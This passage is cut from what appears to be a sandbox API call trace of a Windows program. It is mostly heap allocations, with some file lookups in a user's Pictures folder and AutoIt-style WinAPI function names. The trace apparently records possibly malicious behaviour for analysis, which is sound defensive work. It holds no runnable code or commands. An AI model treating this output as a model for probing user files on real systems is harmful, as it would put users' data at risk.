wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0089.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0089.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0089.637] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22963900, ftCreationTime.dwHighDateTime=0x1d5eadd, ftLastAccessTime.dwLowDateTime=0x64985a50, ftLastAccessTime.dwHighDateTime=0x1d5eb68, ftLastWriteTime.dwLowDateTime=0x64985a50, ftLastWriteTime.dwHighDateTime=0x1d5eb68, nFileSizeHigh=0x0, nFileSizeLow=0x3a40, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="qBLfci.gif", cAlternateFileName="")) returned 0x41ac280 [0089.637] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0089.638] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0089.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0089.639] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0089.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0089.639] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0089.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0089.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0089.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0089.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0089.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0089.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0089.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0089.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0089.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0089.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0089.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0089.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0089.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0089.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0089.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0089.642] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0089.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0089.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0089.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0089.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0089.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0089.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.694] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 